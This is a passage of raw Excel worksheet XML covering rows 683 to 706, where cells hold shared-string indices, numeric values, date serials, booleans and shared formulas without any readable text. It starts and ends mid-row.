        <v>3105</v>
      </c>
      <c r="K683" s="2" t="s">
        <v>3106</v>
      </c>
      <c r="L683" s="1">
        <v>14.0</v>
      </c>
      <c r="M683" s="1">
        <v>27.0</v>
      </c>
      <c r="N683" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O683" s="1" t="s">
        <v>3107</v>
      </c>
      <c r="P683" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q683" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R683" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S683" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="1">
        <v>9872.0</v>
      </c>
      <c r="B684" s="2" t="s">
        <v>3108</v>
      </c>
      <c r="C684" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D684" s="2" t="s">
        <v>3109</v>
      </c>
      <c r="E684" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F684" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G684" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H684" s="4">
        <v>44259.64444444444</v>
      </c>
      <c r="I684" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J684" s="1" t="s">
        <v>3110</v>
      </c>
      <c r="K684" s="2" t="s">
        <v>3111</v>
      </c>
      <c r="L684" s="1">
        <v>1.0</v>
      </c>
      <c r="M684" s="1">
        <v>1.0</v>
      </c>
      <c r="N684" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O684" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P684" s="1" t="s">
        <v>3112</v>
      </c>
      <c r="Q684" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R684" s="2">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="S684" s="1">
        <f t="shared" si="3"/>
        <v>12</v>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="1">
        <v>9873.0</v>
      </c>
      <c r="B685" s="2" t="s">
        <v>3113</v>
      </c>
      <c r="C685" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D685" s="2" t="s">
        <v>3114</v>
      </c>
      <c r="E685" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F685" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G685" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H685" s="5">
        <v>44511.07430555556</v>
      </c>
      <c r="I685" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J685" s="1" t="s">
        <v>3115</v>
      </c>
      <c r="K685" s="2" t="s">
        <v>3116</v>
      </c>
      <c r="L685" s="1">
        <v>5.0</v>
      </c>
      <c r="M685" s="1">
        <v>5.0</v>
      </c>
      <c r="N685" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O685" s="1" t="s">
        <v>3117</v>
      </c>
      <c r="P685" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q685" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R685" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S685" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="1">
        <v>9876.0</v>
      </c>
      <c r="B686" s="2" t="s">
        <v>3118</v>
      </c>
      <c r="C686" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D686" s="2" t="s">
        <v>3114</v>
      </c>
      <c r="E686" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F686" s="1" t="s">
        <v>2048</v>
      </c>
      <c r="G686" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H686" s="5">
        <v>44511.26458333333</v>
      </c>
      <c r="I686" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J686" s="1" t="s">
        <v>3115</v>
      </c>
      <c r="K686" s="2" t="s">
        <v>3116</v>
      </c>
      <c r="L686" s="1">
        <v>5.0</v>
      </c>
      <c r="M686" s="1">
        <v>5.0</v>
      </c>
      <c r="N686" s="1" t="s">
        <v>2959</v>
      </c>
      <c r="O686" s="1" t="s">
        <v>3117</v>
      </c>
      <c r="P686" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q686" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R686" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S686" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="1">
        <v>9877.0</v>
      </c>
      <c r="B687" s="2" t="s">
        <v>3119</v>
      </c>
      <c r="C687" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D687" s="2" t="s">
        <v>3114</v>
      </c>
      <c r="E687" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F687" s="1" t="s">
        <v>1103</v>
      </c>
      <c r="G687" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H687" s="5">
        <v>44511.552083333336</v>
      </c>
      <c r="I687" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J687" s="1" t="s">
        <v>3115</v>
      </c>
      <c r="K687" s="2" t="s">
        <v>3116</v>
      </c>
      <c r="L687" s="1">
        <v>5.0</v>
      </c>
      <c r="M687" s="1">
        <v>5.0</v>
      </c>
      <c r="N687" s="1" t="s">
        <v>3120</v>
      </c>
      <c r="O687" s="1" t="s">
        <v>3117</v>
      </c>
      <c r="P687" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q687" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R687" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S687" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="1">
        <v>9878.0</v>
      </c>
      <c r="B688" s="2" t="s">
        <v>3121</v>
      </c>
      <c r="C688" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D688" s="2" t="s">
        <v>3122</v>
      </c>
      <c r="E688" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F688" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G688" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H688" s="4">
        <v>43993.76180555556</v>
      </c>
      <c r="I688" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J688" s="1" t="s">
        <v>3123</v>
      </c>
      <c r="K688" s="2" t="s">
        <v>3124</v>
      </c>
      <c r="L688" s="1">
        <v>1.0</v>
      </c>
      <c r="M688" s="1">
        <v>1.0</v>
      </c>
      <c r="N688" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O688" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P688" s="1" t="s">
        <v>3125</v>
      </c>
      <c r="Q688" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R688" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S688" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="1">
        <v>9879.0</v>
      </c>
      <c r="B689" s="2" t="s">
        <v>3126</v>
      </c>
      <c r="C689" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D689" s="2" t="s">
        <v>3127</v>
      </c>
      <c r="E689" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F689" s="1" t="s">
        <v>879</v>
      </c>
      <c r="G689" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H689" s="4">
        <v>44448.95486111111</v>
      </c>
      <c r="I689" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J689" s="1" t="s">
        <v>3128</v>
      </c>
      <c r="K689" s="2" t="s">
        <v>3129</v>
      </c>
      <c r="L689" s="1">
        <v>3.0</v>
      </c>
      <c r="M689" s="1">
        <v>6.0</v>
      </c>
      <c r="N689" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O689" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="P689" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q689" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R689" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S689" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="1">
        <v>9880.0</v>
      </c>
      <c r="B690" s="2" t="s">
        <v>3131</v>
      </c>
      <c r="C690" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D690" s="2" t="s">
        <v>3132</v>
      </c>
      <c r="E690" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F690" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G690" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H690" s="4">
        <v>44448.981944444444</v>
      </c>
      <c r="I690" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J690" s="1" t="s">
        <v>3128</v>
      </c>
      <c r="K690" s="2" t="s">
        <v>3129</v>
      </c>
      <c r="L690" s="1">
        <v>3.0</v>
      </c>
      <c r="M690" s="1">
        <v>6.0</v>
      </c>
      <c r="N690" s="1" t="s">
        <v>3133</v>
      </c>
      <c r="O690" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="P690" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q690" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R690" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S690" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="1">
        <v>9883.0</v>
      </c>
      <c r="B691" s="2" t="s">
        <v>3134</v>
      </c>
      <c r="C691" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D691" s="2" t="s">
        <v>3135</v>
      </c>
      <c r="E691" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F691" s="1" t="s">
        <v>3136</v>
      </c>
      <c r="G691" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H691" s="1" t="s">
        <v>3137</v>
      </c>
      <c r="I691" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J691" s="1" t="s">
        <v>3128</v>
      </c>
      <c r="K691" s="2" t="s">
        <v>3129</v>
      </c>
      <c r="L691" s="1">
        <v>3.0</v>
      </c>
      <c r="M691" s="1">
        <v>6.0</v>
      </c>
      <c r="N691" s="1" t="s">
        <v>3138</v>
      </c>
      <c r="O691" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="P691" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q691" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R691" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S691" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="1">
        <v>9885.0</v>
      </c>
      <c r="B692" s="2" t="s">
        <v>3139</v>
      </c>
      <c r="C692" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D692" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E692" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F692" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G692" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H692" s="1" t="s">
        <v>3141</v>
      </c>
      <c r="I692" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J692" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K692" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L692" s="1">
        <v>8.0</v>
      </c>
      <c r="M692" s="1">
        <v>10.0</v>
      </c>
      <c r="N692" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O692" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P692" s="1" t="s">
        <v>3145</v>
      </c>
      <c r="Q692" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R692" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S692" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="1">
        <v>9886.0</v>
      </c>
      <c r="B693" s="2" t="s">
        <v>3146</v>
      </c>
      <c r="C693" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D693" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E693" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F693" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G693" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H693" s="1" t="s">
        <v>3147</v>
      </c>
      <c r="I693" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J693" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K693" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L693" s="1">
        <v>8.0</v>
      </c>
      <c r="M693" s="1">
        <v>10.0</v>
      </c>
      <c r="N693" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O693" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P693" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q693" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R693" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S693" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="1">
        <v>9887.0</v>
      </c>
      <c r="B694" s="2" t="s">
        <v>3148</v>
      </c>
      <c r="C694" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D694" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E694" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F694" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G694" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H694" s="1" t="s">
        <v>3149</v>
      </c>
      <c r="I694" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J694" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K694" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L694" s="1">
        <v>8.0</v>
      </c>
      <c r="M694" s="1">
        <v>10.0</v>
      </c>
      <c r="N694" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O694" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P694" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q694" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R694" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S694" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="1">
        <v>9888.0</v>
      </c>
      <c r="B695" s="2" t="s">
        <v>3150</v>
      </c>
      <c r="C695" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D695" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E695" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F695" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G695" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H695" s="1" t="s">
        <v>3151</v>
      </c>
      <c r="I695" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J695" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K695" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L695" s="1">
        <v>8.0</v>
      </c>
      <c r="M695" s="1">
        <v>10.0</v>
      </c>
      <c r="N695" s="1" t="s">
        <v>3152</v>
      </c>
      <c r="O695" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P695" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q695" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R695" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S695" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="1">
        <v>9889.0</v>
      </c>
      <c r="B696" s="2" t="s">
        <v>3153</v>
      </c>
      <c r="C696" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D696" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E696" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F696" s="1" t="s">
        <v>3154</v>
      </c>
      <c r="G696" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H696" s="1" t="s">
        <v>3155</v>
      </c>
      <c r="I696" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J696" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K696" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L696" s="1">
        <v>8.0</v>
      </c>
      <c r="M696" s="1">
        <v>10.0</v>
      </c>
      <c r="N696" s="1" t="s">
        <v>433</v>
      </c>
      <c r="O696" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P696" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q696" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R696" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S696" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="1">
        <v>9890.0</v>
      </c>
      <c r="B697" s="2" t="s">
        <v>3156</v>
      </c>
      <c r="C697" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D697" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E697" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F697" s="1" t="s">
        <v>197</v>
      </c>
      <c r="G697" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H697" s="1" t="s">
        <v>3157</v>
      </c>
      <c r="I697" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J697" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K697" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L697" s="1">
        <v>8.0</v>
      </c>
      <c r="M697" s="1">
        <v>10.0</v>
      </c>
      <c r="N697" s="1" t="s">
        <v>1844</v>
      </c>
      <c r="O697" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P697" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q697" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R697" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S697" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="1">
        <v>9891.0</v>
      </c>
      <c r="B698" s="2" t="s">
        <v>3158</v>
      </c>
      <c r="C698" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D698" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E698" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F698" s="1" t="s">
        <v>191</v>
      </c>
      <c r="G698" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H698" s="1" t="s">
        <v>3159</v>
      </c>
      <c r="I698" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J698" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K698" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L698" s="1">
        <v>8.0</v>
      </c>
      <c r="M698" s="1">
        <v>10.0</v>
      </c>
      <c r="N698" s="1" t="s">
        <v>3160</v>
      </c>
      <c r="O698" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P698" s="1" t="s">
        <v>2541</v>
      </c>
      <c r="Q698" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R698" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S698" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="1">
        <v>9893.0</v>
      </c>
      <c r="B699" s="2" t="s">
        <v>3161</v>
      </c>
      <c r="C699" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D699" s="2" t="s">
        <v>3140</v>
      </c>
      <c r="E699" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F699" s="1" t="s">
        <v>3162</v>
      </c>
      <c r="G699" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H699" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="I699" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J699" s="1" t="s">
        <v>3142</v>
      </c>
      <c r="K699" s="2" t="s">
        <v>3143</v>
      </c>
      <c r="L699" s="1">
        <v>8.0</v>
      </c>
      <c r="M699" s="1">
        <v>10.0</v>
      </c>
      <c r="N699" s="1" t="s">
        <v>3164</v>
      </c>
      <c r="O699" s="1" t="s">
        <v>3144</v>
      </c>
      <c r="P699" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q699" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R699" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S699" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="1">
        <v>9895.0</v>
      </c>
      <c r="B700" s="2" t="s">
        <v>3165</v>
      </c>
      <c r="C700" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D700" s="2" t="s">
        <v>3166</v>
      </c>
      <c r="E700" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F700" s="1" t="s">
        <v>521</v>
      </c>
      <c r="G700" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H700" s="4">
        <v>43871.80069444444</v>
      </c>
      <c r="I700" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J700" s="1" t="s">
        <v>3167</v>
      </c>
      <c r="K700" s="2" t="s">
        <v>3168</v>
      </c>
      <c r="L700" s="1">
        <v>1.0</v>
      </c>
      <c r="M700" s="1">
        <v>2.0</v>
      </c>
      <c r="N700" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O700" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P700" s="1" t="s">
        <v>3169</v>
      </c>
      <c r="Q700" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R700" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S700" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="1">
        <v>9896.0</v>
      </c>
      <c r="B701" s="2" t="s">
        <v>3170</v>
      </c>
      <c r="C701" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D701" s="2" t="s">
        <v>3166</v>
      </c>
      <c r="E701" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F701" s="1" t="s">
        <v>521</v>
      </c>
      <c r="G701" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H701" s="4">
        <v>43871.80069444444</v>
      </c>
      <c r="I701" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J701" s="1" t="s">
        <v>3167</v>
      </c>
      <c r="K701" s="2" t="s">
        <v>3168</v>
      </c>
      <c r="L701" s="1">
        <v>1.0</v>
      </c>
      <c r="M701" s="1">
        <v>2.0</v>
      </c>
      <c r="N701" s="1" t="s">
        <v>132</v>
      </c>
      <c r="O701" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P701" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q701" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R701" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S701" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="1">
        <v>9897.0</v>
      </c>
      <c r="B702" s="2" t="s">
        <v>3171</v>
      </c>
      <c r="C702" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D702" s="2" t="s">
        <v>3172</v>
      </c>
      <c r="E702" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F702" s="1" t="s">
        <v>3173</v>
      </c>
      <c r="G702" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H702" s="4">
        <v>44567.07638888889</v>
      </c>
      <c r="I702" s="1" t="s">
        <v>2665</v>
      </c>
      <c r="J702" s="1" t="s">
        <v>3174</v>
      </c>
      <c r="K702" s="2" t="s">
        <v>3175</v>
      </c>
      <c r="L702" s="1">
        <v>1.0</v>
      </c>
      <c r="M702" s="1">
        <v>1.0</v>
      </c>
      <c r="N702" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O702" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P702" s="1" t="s">
        <v>2541</v>
      </c>
      <c r="Q702" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R702" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S702" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="1">
        <v>9900.0</v>
      </c>
      <c r="B703" s="2" t="s">
        <v>3176</v>
      </c>
      <c r="C703" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D703" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E703" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F703" s="1" t="s">
        <v>3178</v>
      </c>
      <c r="G703" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H703" s="1" t="s">
        <v>3179</v>
      </c>
      <c r="I703" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J703" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K703" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L703" s="1">
        <v>7.0</v>
      </c>
      <c r="M703" s="1">
        <v>15.0</v>
      </c>
      <c r="N703" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O703" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P703" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q703" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R703" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S703" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="1">
        <v>9901.0</v>
      </c>
      <c r="B704" s="2" t="s">
        <v>3183</v>
      </c>
      <c r="C704" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D704" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E704" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F704" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G704" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H704" s="1" t="s">
        <v>3184</v>
      </c>
      <c r="I704" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J704" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K704" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L704" s="1">
        <v>7.0</v>
      </c>
      <c r="M704" s="1">
        <v>15.0</v>
      </c>
      <c r="N704" s="1" t="s">
        <v>2016</v>
      </c>
      <c r="O704" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P704" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q704" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R704" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S704" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="1">
        <v>9902.0</v>
      </c>
      <c r="B705" s="2" t="s">
        <v>3185</v>
      </c>
      <c r="C705" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D705" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E705" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F705" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G705" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H705" s="1" t="s">
        <v>3186</v>
      </c>
      <c r="I705" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J705" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K705" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L705" s="1">
        <v>7.0</v>
      </c>
      <c r="M705" s="1">
        <v>15.0</v>
      </c>
      <c r="N705" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O705" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P705" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q705" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R705" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S705" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="1">
        <v>9903.0</v>
      </c>
      <c r="B706" s="2" t="s">
        <v>3187</v>
      </c>
      <c r="C706" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D706" s="2" t="s">
        <v>3177</v>
      </c>
      <c r="E706" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F706" s="1" t="s">
        <v>3188</v>
      </c>
      <c r="G706" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H706" s="4">
        <v>44419.70763888889</v>
      </c>
      <c r="I706" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J706" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="K706" s="2" t="s">
        <v>3181</v>
      </c>
      <c r="L706" s="1">
        <v>7.0</v>
      </c>
      <c r="M706" s="1">
        <v>15.0</v>
      </c>
      <c r="N706" s="1" t="s">
        <v>3189</v>
      </c>
      <c r="O706" s="1" t="s">
        <v>3182</v>
      </c>
      <c r="P706" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q706" s="1">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="R706" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S706" s="1">
        <f t="shared" si="3"/>
